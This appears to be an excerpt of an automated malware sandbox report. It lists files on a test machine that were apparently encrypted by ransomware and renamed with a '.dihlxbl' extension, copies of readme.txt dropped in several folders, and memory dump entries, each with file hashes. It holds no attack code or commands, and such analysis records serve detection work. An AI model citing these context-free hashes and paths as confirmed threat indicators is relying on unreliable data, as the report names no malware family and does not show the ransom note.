6a28d0ccbdabbb27bd622b1888f8dbb5d71a3b587bc8d25d0a9eefbf1f4d27e0a92331e1a5eba34e9417509a6a69ccdc1e504fb902b7bac355b573e4900c55d3

Download Submit
C:\Users\Admin\Desktop\RequestRename.gif.dihlxbl

Filesize
355KB

MD5
fb950e7e2953e5bedc4edb1b943e930e

SHA1
184573b49df89150559405cbf65e2057e0ccf842

SHA256
69a9c3d9cb8f4a7fe60652e35d5ec6873631dd6e24307e395cc1ff8f49052538

SHA512
4664683236f3be5b17457ce22af0610643f54e26bca191d6f4c89c77b91ab4e129a6a342d9413269eb1d5a3c5d086f953020c08205f06af3ba59dc38c4a48778

Download Submit
C:\Users\Admin\Desktop\ShowCopy.wma.dihlxbl

Filesize
414KB

MD5
782d8a15e253d6031f5f8d53823bc976

SHA1
e338c7e89d780286b1a49eda95b83f90984e53fa

SHA256
f29a082d21646236d299377a59c61b1881ac64468ec9c42a1af16f458d17f937

SHA512
3de9c1ecb094eab362f91aae1efce6336010f818c8e6c93d2f59d9ac5fe4ae61fbeaa9e5169c94d0380af2805bff36f16ef37d3e6a147b3927c97c6c1d4ac6c7

Download Submit
C:\Users\Admin\Desktop\ShowImport.dib.dihlxbl

Filesize
859KB

MD5
efd125fbd51e0902d30b9145001d0336

SHA1
29d38dbb7e69f6634d16a72666b2246c5acf3c31

SHA256
388dae067ec88299bd560517be372cb9f44b1ddef588e7dad36e606b466d10c5

SHA512
af215a99945715dadc8a7770d9446c5bd7ef5d6627bf226962da72d7318dc5a1d18f8ed949a143dfe1ce85cdd32d00dc6cf297770be8ceebf83b91d7cc389ea6

Download Submit
C:\Users\Admin\Desktop\UnprotectSubmit.docm.dihlxbl

Filesize
592KB

MD5
1dc5d03bbe5c85d85252d9e9bf50141e

SHA1
8395ca7102ffaf324bb46426750a1e909a219277

SHA256
1de978ed6fd9a8f690a2e786e5b1f8b3e87b058607363c63a57409ef646aa360

SHA512
5394a16f5fb5f13c60dda25e3c5fcd8abd9ff8498a0e218fe79ad4c756216a53821ed70e546c46f59f7dd174a25ce665e3f180992be9370545a245efe05e21e6

Download Submit
C:\Users\Admin\Desktop\readme.txt

Filesize
1KB

MD5
88e072dcf2826e2752a8c3f45dd5f388

SHA1
b694319dd2730d090cf2518ac491384e599eacd9

SHA256
e5d20f739495cedc250811887c071fa4a9b9d8a292154d1a0aadf233bbe4b16c

SHA512
2aefb2d748a20627adafe4e0cb64b7002dc5250ecd56680e7e66ac77a14651e282cfa6f3b85efd158ec47d3acc269cf070a09acde7ca5ba9c0f312dd6d0801d7

Download Submit
C:\Users\Admin\Pictures\ExportDeny.png

Filesize
1024KB

MD5
155be85a717627101b4d56919e822506

SHA1
0a73e3375967e9c6784720889f68579d1d398eb2

SHA256
a3c3ee174a46c8c440e6f68d392c5273e1f4922b7fe253962c2bc6541ef46882

SHA512
031bda66d825705c7f8ceb36e676f0a0730462e013ddbb39b3455238c40513cd2b0b7a8da4737eb35381f4938f52fc1cd45bfb31fe63c10575bcb6e4c8728241

Download Submit
C:\Users\Admin\Pictures\ExportDeny.png

Filesize
1024KB

MD5
ad65391755933ab46285b40fe9b0a0c8

SHA1
422332940d30e0130a132d2fff720a689eee5539

SHA256
08491c7d086c84efeecacccb1a81b262f6f6478ef78733f602d9e03fa9dfd16a

SHA512
86fe29b2dd26916a461984e8b0e81cc53a1cdd04d0b943aa4f5424481d852658c723266031d6a345108b2a1e87cb0575345a1139fad8fcf4fa0f45cbaf6a0078

Download Submit
C:\Users\Admin\Pictures\ExportDeny.png

Filesize
1024KB

MD5
44c86ad41e67c424e4babe78fdc45995

SHA1
13ae516aae126b977b08f335ca8877b8892dbd6a

SHA256
3fec39ff7d215c57fbf18900c0f8bd02e964114431daa0243b16b057a1b99a70

SHA512
abea187d57ac20ddee934415ce927266378ae98e63124b2a79515fbac4538f684b63153a697df9b66439c635a5202bf529fa57a8c295c403ab49d5dbd089dc8b

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
88e072dcf2826e2752a8c3f45dd5f388

SHA1
b694319dd2730d090cf2518ac491384e599eacd9

SHA256
e5d20f739495cedc250811887c071fa4a9b9d8a292154d1a0aadf233bbe4b16c

SHA512
2aefb2d748a20627adafe4e0cb64b7002dc5250ecd56680e7e66ac77a14651e282cfa6f3b85efd158ec47d3acc269cf070a09acde7ca5ba9c0f312dd6d0801d7

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
88e072dcf2826e2752a8c3f45dd5f388

SHA1
b694319dd2730d090cf2518ac491384e599eacd9

SHA256
e5d20f739495cedc250811887c071fa4a9b9d8a292154d1a0aadf233bbe4b16c

SHA512
2aefb2d748a20627adafe4e0cb64b7002dc5250ecd56680e7e66ac77a14651e282cfa6f3b85efd158ec47d3acc269cf070a09acde7ca5ba9c0f312dd6d0801d7

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
88e072dcf2826e2752a8c3f45dd5f388

SHA1
b694319dd2730d090cf2518ac491384e599eacd9

SHA256
e5d20f739495cedc250811887c071fa4a9b9d8a292154d1a0aadf233bbe4b16c

SHA512
2aefb2d748a20627adafe4e0cb64b7002dc5250ecd56680e7e66ac77a14651e282cfa6f3b85efd158ec47d3acc269cf070a09acde7ca5ba9c0f312dd6d0801d7

Download Submit
C:\Users\Public\readme.txt

Filesize
1KB

MD5
88e072dcf2826e2752a8c3f45dd5f388

SHA1
b694319dd2730d090cf2518ac491384e599eacd9

SHA256
e5d20f739495cedc250811887c071fa4a9b9d8a292154d1a0aadf233bbe4b16c

SHA512
2aefb2d748a20627adafe4e0cb64b7002dc5250ecd56680e7e66ac77a14651e282cfa6f3b85efd158ec47d3acc269cf070a09acde7ca5ba9c0f312dd6d0801d7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/268-69-0x0000000000000000-mapping.dmp

Download
memory/552-100-0x0000000000000000-mapping.dmp

Download
memory/580-113-0x0000000000000000-mapping.dmp

Download
memory/664-99-0x0000000000000000-mapping.dmp

Download
memory/896-105-0x0000000000000000-mapping.dmp

Download
memory/1116-54-0x00000000005A0000-0x00000000005A4000-memory.dmp

Filesize
16KB

Download
memory/1156-71-0x0000000000000000-mapping.dmp

Download
memory/1168-70-0x0000000000000000-mapping.dmp

Download
memory/1252-83-0x0000000000000000-mapping.dmp

Download
memory/1268-80-0x0000000000000000-mapping.dmp

Download
memory/1308-106-0x0000000000000000-mapping.dmp

Download
memory/1400-82-0x0000000000000000-mapping.dmp

Download
memory/1472-117-0x0000000000000000-mapping.dmp

Download
memory/1588-79-0x0000000000000000-mapping.dmp

Download
memory/1636-114-0x0000000000000000-mapping.dmp

Download
memory/1804-112-0x0000000000000000-mapping.dmp

Download
memory/1812-66-0x0000000000000000-mapping.dmp

Download
memory/1812-67-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/1984-107-0x0000000000000000-mapping.dmp

Download
memory/2040-111-0x0000000000000000-mapping.dmp

Download